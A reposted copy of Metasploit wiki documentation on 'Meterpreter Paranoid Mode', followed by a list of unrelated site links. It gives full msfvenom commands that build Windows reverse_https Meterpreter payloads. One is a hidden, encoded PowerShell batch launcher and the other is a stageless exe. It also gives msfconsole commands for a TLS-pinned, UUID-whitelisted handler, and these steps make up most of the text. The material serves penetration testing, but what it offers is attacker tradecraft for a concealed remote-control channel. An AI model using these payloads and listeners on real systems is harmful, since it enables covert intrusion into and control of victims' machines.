Meterpreter Paranoid Mode https(SSL)
来源:互联网 发布:linux socket 依赖的库 编辑:程序博客网 时间:2024/05/18 00:41
In some scenarios, it pays to be paranoid. This also applies to generating and handling Meterpreter sessions. This document walks through the process of implementing a paranoid Meterpreter payload and listener.
Create a SSL/TLS Certificate
For best results, use a SSL/TLS certificate signed by a trusted certificate authority. Failing that, you can still generate a self-signed unified PEM using the following command:
$ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \ -keyout www.example.com.key \ -out www.example.com.crt && \cat www.example.com.key www.example.com.crt > www.example.com.pem && \rm -f www.example.com.key www.example.com.crt
Create a Paranoid Payload
For this use case, we will combine Payload UUID tracking and whitelisting with TLS pinning. For a staged payload, we will use the following command:
$ ./msfvenom -p windows/meterpreter/reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat$ head launch-paranoid.bat %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...
A stageless version of this would look like the following:
$ ./msfvenom -p windows/meterpreter_reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedStageless -f exe -o launch-paranoid-stageless.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 885314 bytesSaved as: launch-paranoid-stageless.exe
Create a Paranoid Listener
A staged payload would need to set the HandlerSSLCert
and StagerVerifySSLCert
options to enable TLS pinning and IgnoreUnknownPayloads
to whitelist registered payload UUIDs:
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'
A stageless version is only slightly different:
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'
#from https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode
- Meterpreter Paranoid Mode https(SSL)
- HTTPS SSL
- SSL (https)
- ssl HTTPS
- ssl && https
- https & SSL
- https/ssl
- SSL,HTTPS
- HTTPS,SSL
- HTTPS SSL
- HTTPS(SSL)
- https ssl
- https ssl
- https,ssl
- HTTPS、SSL、数字证书
- HTTPS,SSL编程
- 关于SSL和https
- java SSL https 资料
- Oracle 数据库命令导入、导出
- 顺时针打印矩阵
- leetcode 日经贴,Cpp code -Majority Element II
- BZOJ 1070 [SCOI2007]修车 最小费用流
- [LeetCode]Summary Ranges
- Meterpreter Paranoid Mode https(SSL)
- 0/1背包问题:
- RVM is not a function
- LeetCode_66---Plus One
- 网络故障:无线路由器???
- SpringMVC处理同意异常
- mysql-5.6.14-winx64中文乱码
- 聊天服务器-解密陌生人(11)群组管理和群组聊天
- 流水号的生成(日期+业务码+自增序列)